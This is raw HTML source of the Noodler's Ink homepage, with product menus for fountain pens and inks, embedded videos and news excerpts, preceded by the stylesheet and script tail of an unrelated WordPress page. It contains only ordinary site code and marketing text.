auto}.et_pb_blurb_0.et_pb_blurb .et_pb_main_blurb_image{background-color:#94c158;border-radius:150px;padding:40px;min-height:225px!important}.et_pb_blurb_1.et_pb_blurb h4,.et_pb_blurb_1.et_pb_blurb h4 a,.et_pb_blurb_1.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_1.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_1.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_1.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_1.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h6.et_pb_module_header a{font-weight:700;font-style:italic}.et_pb_blurb_0.et_pb_blurb{font-weight:700;font-style:italic;margin:0 auto}.et_pb_blurb_0.et_pb_blurb h4,.et_pb_blurb_0.et_pb_blurb h4 a,.et_pb_blurb_0.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_0.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_0.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_0.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_0.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h6.et_pb_module_header a{font-weight:700;font-style:italic}.et_pb_section_3{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px}.et_pb_row_5.et_pb_row{padding-top:60px;padding-right:0px;padding-bottom:0;padding-left:0px}.et_pb_blurb_3.et_pb_blurb h4,.et_pb_blurb_3.et_pb_blurb h4 a,.et_pb_blurb_3.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_3.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_3.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_3.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_3.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h6.et_pb_module_header a{font-weight:700;font-style:italic}.et_pb_blurb_1.et_pb_blurb{font-weight:700;font-style:italic;margin:0 auto}.et_pb_blurb_2.et_pb_blurb{font-weight:700;font-style:italic;margin:0 auto}.et_pb_blurb_1.et_pb_blurb .et_pb_main_blurb_image{background-color:#94c158;border-radius:150px;padding:40px;min-height:225px!important}.et_pb_blurb_2.et_pb_blurb h4,.et_pb_blurb_2.et_pb_blurb h4 a,.et_pb_blurb_2.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_2.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_2.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_2.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_2.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h6.et_pb_module_header a{font-weight:700;font-style:italic}.et_pb_blurb_2.et_pb_blurb .et_pb_main_blurb_image{background-color:#94c158;border-radius:150px;padding:40px;min-height:225px!important}.et_pb_contact_field_4 input,.et_pb_contact_field_4 textarea,.et_pb_contact_field_4 label{text-align:left}.et_pb_contact_field_9 input,.et_pb_contact_field_9 textarea,.et_pb_contact_field_9 label{text-align:left}.et_pb_contact_field_8 input,.et_pb_contact_field_8 textarea,.et_pb_contact_field_8 label{text-align:left}.et_pb_contact_field_5 input,.et_pb_contact_field_5 textarea,.et_pb_contact_field_5 label{text-align:left}.et_pb_image_3.et_pb_module{margin-left:auto!important;margin-right:auto!important}.et_pb_image_1.et_pb_module{margin-left:auto!important;margin-right:0px!important}</style> <script type="text/javascript">var omapi_localized = { ajax: 'https://website.thatsbiz.com/wp-admin/admin-ajax.php?optin-monster-ajax-route=1', nonce: '18c61f86e2', slugs: {"yedvptn5hzi2llap":{"slug":"yedvptn5hzi2llap","mailpoet":false},"xbr3zqzj9kha2cyf":{"slug":"xbr3zqzj9kha2cyf","mailpoet":false},"ipvkkvjibcsmqwxu":{"slug":"ipvkkvjibcsmqwxu","mailpoet":false},"mhhcl31g4exnodfj":{"slug":"mhhcl31g4exnodfj","mailpoet":false}} };</script> <script type="text/javascript" src="https://tp126.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=f34624672c7bea9afc65b3e928a22e7a"></script><script> window.lazyLoadOptions = { elements_selector: "img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]", data_src: "lazy-src", data_srcset: "lazy-srcset", data_sizes: "lazy-sizes", skip_invisible: false, class_loading: "lazyloading", class_loaded: "lazyloaded", threshold: 300, callback_load: function(element) { if ( element.tagName === "IFRAME" && element.dataset.rocketLazyload == "fitvidscompatible" ) { if (element.classList.contains("lazyloaded") ) { if (typeof window.jQuery != "undefined") { if (jQuery.fn.fitVids) { jQuery(element).parent().fitVids(); } } } } }}; window.addEventListener('LazyLoad::Initialized', function (e) { var lazyLoadInstance = e.detail.instance; if (window.MutationObserver) { var observer = new MutationObserver(function(mutations) { mutations.forEach(function(mutation) { for (i = 0; i < mutation.addedNodes.length; i++) { if (typeof mutation.addedNodes[i].getElementsByTagName !== 'function') { return; } if (typeof mutation.addedNodes[i].getElementsByClassName !== 'function') { return; } imgs = mutation.addedNodes[i].getElementsByTagName('img'); iframes = mutation.addedNodes[i].getElementsByTagName('iframe'); rocket_lazy = mutation.addedNodes[i].getElementsByClassName('rocket-lazyload'); if ( 0 === imgs.length && 0 === iframes.length && 0 === rocket_lazy.length ) { return; } lazyLoadInstance.update(); } } ); } ); var b = document.getElementsByTagName("body")[0]; var config = { childList: true, subtree: true }; observer.observe(b, config); } }, false); </script><script data-no-minify="1" async src="https://website.thatsbiz.com/wp-content/plugins/wp-rocket/assets/js/lazyload/11.0.6/lazyload.min.js"></script></body> </html> <!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1557944944 -->
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="Distributed by Luxury Brands USA, LLC" /> <meta name="robots" content="noodp,noydir" /> <title>Noodler&#039;s Ink &#8211; Distributed by Luxury Brands USA, LLC</title> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Noodler&#039;s Ink &raquo; Feed" href="http://noodlersink.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Noodler&#039;s Ink &raquo; Comments Feed" href="http://noodlersink.com/comments/feed/" /> <link rel="canonical" href="http://noodlersink.com/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/noodlersink.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='colorbox-theme1-css' href='http://noodlersink.com/wp-content/plugins/jquery-lightbox-for-native-galleries/colorbox/theme1/colorbox.css?ver=1.3.14' type='text/css' media='screen' /> <link rel='stylesheet' id='social-eyes-theme-css' href='http://noodlersink.com/wp-content/themes/socialeyes/style.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='http://noodlersink.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://noodlersink.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='addtoany-css' href='http://noodlersink.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.15' type='text/css' media='all' /> <script type='text/javascript' src='http://noodlersink.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://noodlersink.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://noodlersink.com/wp-content/plugins/jquery-lightbox-for-native-galleries/colorbox/jquery.colorbox-min.js?ver=1.3.14'></script> <script type='text/javascript' src='http://noodlersink.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1'></script> <!--[if lt IE 9]> <script type='text/javascript' src='http://noodlersink.com/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript' src='http://noodlersink.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.5.4'></script> <link rel='https://api.w.org/' href='http://noodlersink.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://noodlersink.com/xmlrpc.php?rsd" /> <script data-cfasync="false"> window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={}; (function(d,s,a,b){a=d.createElement(s);b=d.getElementsByTagName(s)[0];a.async=1;a.src="https://static.addtoany.com/menu/page.js";b.parentNode.insertBefore(a,b);})(document,"script"); </script> <style type="text/css"> .enews .screenread { height: 1px; left: -1000em; overflow: hidden; position: absolute; top: -1000em; width: 1px; } </style><link rel="icon" href="http://noodlersink.com/wp-content/themes/socialeyes/images/favicon.ico" /> <link rel="pingback" href="http://noodlersink.com/xmlrpc.php" /> <link rel="next" href="http://noodlersink.com/page/2/" /> <!-- jQuery Lightbox For Native Galleries v3.2.2 | http://www.viper007bond.com/wordpress-plugins/jquery-lightbox-for-native-galleries/ --> <script type="text/javascript"> // <![CDATA[ jQuery(document).ready(function($){ $(".gallery").each(function(index, obj){ var galleryid = Math.floor(Math.random()*10000); $(obj).find("a").colorbox({rel:galleryid, maxWidth:"95%", maxHeight:"95%"}); }); $("a.lightbox").colorbox({maxWidth:"95%", maxHeight:"95%"}); }); // ]]> </script> <!-- Google Analytics Tracking by Google Analyticator 6.5.4: http://www.videousermanuals.com/google-analyticator/ --> <script type="text/javascript"> var analyticsFileTypes = ['']; var analyticsSnippet = 'enabled'; var analyticsEventTracking = 'enabled'; </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-22231145-1']); _gaq.push(['_addDevId', 'i9k95']); // Google Analyticator App ID with Google _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </head> <body class="home blog header-image content-sidebar"><div id="wrap"><div id="header"><div class="wrap"><div id="title-area"><p id="title"><a href="http://noodlersink.com/">Noodler&#039;s Ink</a></p><h1 id="description">Distributed by Luxury Brands USA, LLC</h1></div><div class="widget-area header-widget-area"><div id="text-12" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><a href=http://www.facebook.com/Noodlers target=_blank><img src=http://noodlersink.com/wp-content/uploads/2011/10/homepageImages.facebook.png style="position:relative; right:320px; top:35px;" /></a> <a href=https://twitter.com/carolluxury target=_blank><img src=http://noodlersink.com/wp-content/uploads/2012/07/twitter.png style="position:relative; right:320px; top:35px;" /></a> <a href="https://www.instagram.com/luxury_brandsofamerica/" target=_blank><img src=http://noodlersink.com/wp-content/uploads/instagram.png style="position:relative; right:320px; top:35px;" /><a/></div> </div></div> </div></div></div><div id="nav"><div class="wrap"><ul id="menu-upper-menu-nav" class="menu genesis-nav-menu menu-primary js-superfish"><li id="menu-item-182" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-182"><a href="/" aria-current="page">Home</a></li> <li id="menu-item-242" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-242"><a href="http://noodlersink.com/whats-new/">What&#8217;s New</a></li> <li id="menu-item-113" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-113"><a href="http://noodlersink.com/category/writing-instruments/">Writing Instruments</a> <ul class="sub-menu"> <li id="menu-item-1806" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1806"><a href="http://noodlersink.com/ahab-fountain-pens-by-noodlers-ink/">AHAB SERIES</a></li> <li id="menu-item-1854" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1854"><a href="http://noodlersink.com/konrad-series/">KONRAD SERIES</a></li> <li id="menu-item-1860" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1860"><a href="http://noodlersink.com/konrad-roller-ball-series/">KONRAD ROLLER BALL SERIES</a></li> <li id="menu-item-1890" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1890"><a href="http://noodlersink.com/neponset-series/">Neponset Series</a></li> <li id="menu-item-1948" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1948"><a href="http://noodlersink.com/standard-creaper-series/">STANDARD CREAPER SERIES</a></li> <li id="menu-item-2157" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2157"><a href="http://noodlersink.com/boston-safety-pen/">Boston Safety Pen</a></li> <li id="menu-item-1829" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1829"><a href="http://noodlersink.com/brush-pens/">Brush Pens</a></li> <li id="menu-item-1966" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1966"><a href="http://noodlersink.com/nibs-and-accessories/">NIBS AND ACCESSORIES</a></li> </ul> </li> <li id="menu-item-24" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-24"><a href="http://noodlersink.com/category/fountain-pen-ink/">Fountain Pen Ink</a> <ul class="sub-menu"> <li id="menu-item-2198" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2198"><a href="http://noodlersink.com/noodlers-ink-color/ink-colors-and-their-properties/">INK COLORS AND THEIR PROPERTIES</a></li> <li id="menu-item-2197" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2197"><a target="_blank" href="http://noodlersink.com/wp-content/uploads/Noodlers-Ink-Properties-2019.pdf">Properties PDF</a></li> </ul> </li> <li id="menu-item-186" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-186"><a href="http://noodlersink.com/dealers/">Dealers</a></li> <li id="menu-item-183" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-183"><a href="http://noodlersink.com/contact/">Contact</a></li> </ul></div></div><div id="subnav"><div class="wrap"><ul id="menu-lower-menu" class="menu genesis-nav-menu menu-secondary js-superfish"><li id="menu-item-139" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-139"><a href="http://noodlersink.com/why-noodlers/">Why Noodler’s?</a> <ul class="sub-menu"> <li id="menu-item-156" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-156"><a href="/why-noodlers/">The Noodler&#8217;s Advantage</a></li> <li id="menu-item-143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-143"><a href="http://noodlersink.com/noodlers-durable-ink-classification/">Noodler&#8217;s Benefits</a></li> <li id="menu-item-147" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-147"><a href="http://noodlersink.com/%e2%80%9cwhy-does-noodlers-fill-the-bottles-so-full%e2%80%9d/">Why the Full Bottles?</a></li> </ul> </li> <li id="menu-item-740" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-740"><a href="#">Usage Tips</a> <ul class="sub-menu"> <li id="menu-item-154" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-154"><a href="http://noodlersink.com/adjusting-nibs/">Adjusting Nibs</a></li> <li id="menu-item-181" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-181"><a href="http://noodlersink.com/noodlers-aluminium/">Ink Corrosion Test</a></li> <li id="menu-item-180" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-180"><a href="http://noodlersink.com/ph-test/">pH Test</a></li> </ul> </li> <li id="menu-item-140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-140"><a href="http://noodlersink.com/the-noodlers-advantage/">Note from the Founder</a></li> <li id="menu-item-739" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-739"><a href="http://noodlersink.com/art-inspirations/">Art Inspirations</a></li> </ul></div></div><div id="inner"> <div id="content-sidebar-wrap"> <div id="content" class="hfeed"> <div id="text-13" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><p><a href=http://noodlersink.com/wp-content/uploads/Boston-Safety-Pen-Instruction-link.pdf ><strong>Boston-Safety-Pen-Instruction-link.pdf</strong></a><br /> </p> <p> <br /> <iframe src="https://www.youtube.com/embed/5XVyamsfd58" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></p> <p><iframe src="https://www.youtube.com/embed/RhGU3QQynBQ" frameborder="0" gesture="media" allow="encrypted-media" allowfullscreen></iframe></p> <p><iframe src="https://www.youtube.com/embed/UJr-2fUUtfc" frameborder="0" allowfullscreen></iframe></p> <p><iframe src="https://www.youtube.com/embed/-c_ZSgHo7Ws" frameborder="0" allowfullscreen></iframe></p> <h2>308 and Konrad Rollerball</h2> <p><iframe src="https://www.youtube.com/embed/PWzsfcCcgHQ" frameborder="0" allowfullscreen></iframe></p> <h2>Contest Winner!</h2> <p><iframe src="//www.youtube.com/embed/a0azaLcPKWU?rel=0" frameborder="0" allowfullscreen=""></iframe></p> <p>&nbsp;<br /> &nbsp;</p> <h2>Featured Videos</h2> <p><iframe src="https://www.youtube.com/embed/VLRqMjZ82pc?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" allowfullscreen></iframe><br /> <br /> <iframe src="//www.youtube.com/embed/LgegvUeeVO0?rel=0" frameborder="0" allowfullscreen=""></iframe><br /> <br /> <iframe src="//www.youtube.com/embed/rG6_4GK8QCE?rel=0" frameborder="0" allowfullscreen=""></iframe><br /> <br /> <iframe src="https://www.youtube.com/embed/eIXyBr3-af0" frameborder="0" allowfullscreen></iframe></p> </div> </div></div><div id="featured-post-4" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">What&#8217;s New</h4> <div class="post-2175 post type-post status-publish format-standard hentry category-fountain-pen-ink category-general category-whats-new entry has-post-thumbnail"><a href="http://noodlersink.com/general/more-new-inks/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/19094-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/19094-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/19094-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/more-new-inks/">MORE NEW INKS!</a></h2><p>THE RUSSIAN SERIES EXPANDS!   TO LEARN MORE GO TO THE INK COLORS AND PROPERTIES PAGE! COMING SOON TO AN AUTHORIZED DEALER NEAR YOU! &#x02026; <a href="http://noodlersink.com/general/more-new-inks/" class="more-link">[Read More...]</a></p></div><div class="post-2146 post type-post status-publish format-standard hentry category-fountain-pen-ink category-general category-whats-new category-writing-instruments entry"><h2 class="entry-title"><a href="http://noodlersink.com/general/boston-safety-pen/">Boston Safety Pen</a></h2><p>https://youtu.be/RhGU3QQynBQ &#x02026; <a href="http://noodlersink.com/general/boston-safety-pen/" class="more-link">[Read More...]</a></p></div><div class="post-2138 post type-post status-publish format-standard has-post-thumbnail hentry category-fountain-pen-ink category-general category-whats-new entry"><a href="http://noodlersink.com/general/newnewnewnewnewnew/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/20171220_153647-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/20171220_153647-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/20171220_153647-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/newnewnewnewnewnew/">NEW*NEW*NEW*NEW*NEW*NEW*</a></h2><p>NOODLER'S INK BERNANKE FAST DRYING INK IS NOW IN RED! &nbsp; COMING SOON TO YOUR FAVORITE AUTHORIZED NOODLER'S DEALER!  Available to ship to dealers Dec. 20th. 2017 allow 2 weeks for your dealers to recieve their new Bernanke Red ink.  To learn more email us [email protected]. &#x02026; <a href="http://noodlersink.com/general/newnewnewnewnewnew/" class="more-link">[Read More...]</a></p></div><div class="post-2125 post type-post status-publish format-standard hentry category-whats-new entry has-post-thumbnail"><a href="http://noodlersink.com/whats-new/kung-te-cheng/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/NOODLERS-NEW-LOGO-110x110.png" class="entry-image attachment-post" alt="" itemprop="image" /></a><h2 class="entry-title"><a href="http://noodlersink.com/whats-new/kung-te-cheng/">Kung Te-cheng</a></h2><p>Kung Te-cheng is now in 3oz bottles! The Noodler's Ink you love in a smaller size!    Contact one of our authorized dealers! &#x02026; <a href="http://noodlersink.com/whats-new/kung-te-cheng/" class="more-link">[Read More...]</a></p></div><div class="post-2105 post type-post status-publish format-standard has-post-thumbnail hentry category-fountain-pen-ink category-whats-new entry"><a href="http://noodlersink.com/whats-new/ink/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/new-inks-by-noodlers--110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/new-inks-by-noodlers--110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/new-inks-by-noodlers--250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/whats-new/ink/">WHAT IS NEW WITH NOODLER&#8217;S INK!</a></h2><p>See our Inks &amp; Properties page for details!  &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &#x02026; <a href="http://noodlersink.com/whats-new/ink/" class="more-link">[Read More...]</a></p></div><div class="post-2070 post type-post status-publish format-standard hentry category-general category-whats-new entry"><h2 class="entry-title"><a href="http://noodlersink.com/general/2070/">(no title)</a></h2><p>NEW NEPONSET COLORS  &#x02026; <a href="http://noodlersink.com/general/2070/" class="more-link">[Read More...]</a></p></div><div class="post-2057 post type-post status-publish format-standard has-post-thumbnail hentry category-fountain-pen-ink category-general category-whats-new entry"><a href="http://noodlersink.com/general/2017-dc-pen-show-ink/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/HOUSE-DIVIDED-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/HOUSE-DIVIDED-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/HOUSE-DIVIDED-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/2017-dc-pen-show-ink/">2017 DC Pen Show Ink</a></h2><p>&nbsp; From: CEO and Founder The Noodler’s Ink Company &nbsp; To: Any fellow American who cares to read about the reasons for and development/properties of this ink for the 2017 Washington DC Pen Show called “House/Divided”. &nbsp; Dear fountain pen and ink aficionados, &nbsp; Some of us know that our grandparents knew (or at least knew of) veterans of our terrible Civil War, and that relatively recent perspective in our relatively young country (particularly when &#x02026; <a href="http://noodlersink.com/general/2017-dc-pen-show-ink/" class="more-link">[Read More...]</a></p></div><div class="post-2020 post type-post status-publish format-standard hentry category-general category-whats-new entry has-post-thumbnail"><a href="http://noodlersink.com/general/new-neponset/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/NOODLERS-NEPONSET-WITH-MAP-Aleutian-Agate2-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/NOODLERS-NEPONSET-WITH-MAP-Aleutian-Agate2-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/NOODLERS-NEPONSET-WITH-MAP-Aleutian-Agate2-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/new-neponset/">NEW NEPONSET</a></h2><p>INTRODUCING THE  NEW NOODLER'S ACRYLIC NEPONSET COLLECTION!  &nbsp; THE NEW NEPONSET COLORS ARE SURE TO CAPTURE THE EYE, WHILE THE 3 TINED MUSIC NIB IS SURE TO CAPTURE YOUR SENSES!  THE BEAUTIFUL PEARLIZED ACRYLIC NEPONSET PENS ARE THE PERFECT ADDITION TO YOUR FOUNTAIN PEN COLLECTION JUST IN TIME FOR THE HOLIDAY!  TO LEARN MORE GO TO THE NEPONSET PAGE ON OUR WEBSITE. http://noodlersink.com/neponset-series/ THESE BEAUTIFUL NEW PENS WILL BE AVAILABLE ON NOVEMBER 21ST THROUGH &#x02026; <a href="http://noodlersink.com/general/new-neponset/" class="more-link">[Read More...]</a></p></div><div class="post-1990 post type-post status-publish format-standard has-post-thumbnail hentry category-fountain-pen-ink category-general category-whats-new entry"><a href="http://noodlersink.com/general/american-aristocracy/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/American-Aristocracy-swatched-with-wine-cork-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/American-Aristocracy-swatched-with-wine-cork-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/American-Aristocracy-swatched-with-wine-cork-250x250.jpg 250w" sizes="(max-width: 110px) 100vw, 110px" /></a><h2 class="entry-title"><a href="http://noodlersink.com/general/american-aristocracy/">American Aristocracy</a></h2><p>&nbsp; A message about “American Aristocracy” Henry Gage (3rd Viscount Gage) son of Thomas Gage (Royal Military Governor of Massachusetts) was responsible for the purchase of an estimated 19,000 bottles of wine including the most popular at the time among the aristocrats: red port, dark sherry, and Madeira…  As the aristocrats surely were not giving the wine to those commoners paying the excessively punitive taxation of empire, but instead were using it to pry influence and connections from &#x02026; <a href="http://noodlersink.com/general/american-aristocracy/" class="more-link">[Read More...]</a></p></div><div class="post-1564 post type-post status-publish format-standard hentry category-general category-whats-new category-writing-instruments entry has-post-thumbnail"><a href="http://noodlersink.com/general/new-konrad-colors-coming-soon/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="110" height="110" src="http://noodlersink.com/wp-content/uploads/2015/12/Noodlers-New-1820-Essex-110x110.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="http://noodlersink.com/wp-content/uploads/2015/12/Noodlers-New-1820-Essex-110x110.jpg 110w, http://noodlersink.com/wp-content/uploads/2015/12/Noodlers-New-1820-Essex-250x250.jpg 250w, http://noodlersink.com/wp-content/uploads/2015/12/Noodlers-New-1820-Essex-300x298.jpg 300w, 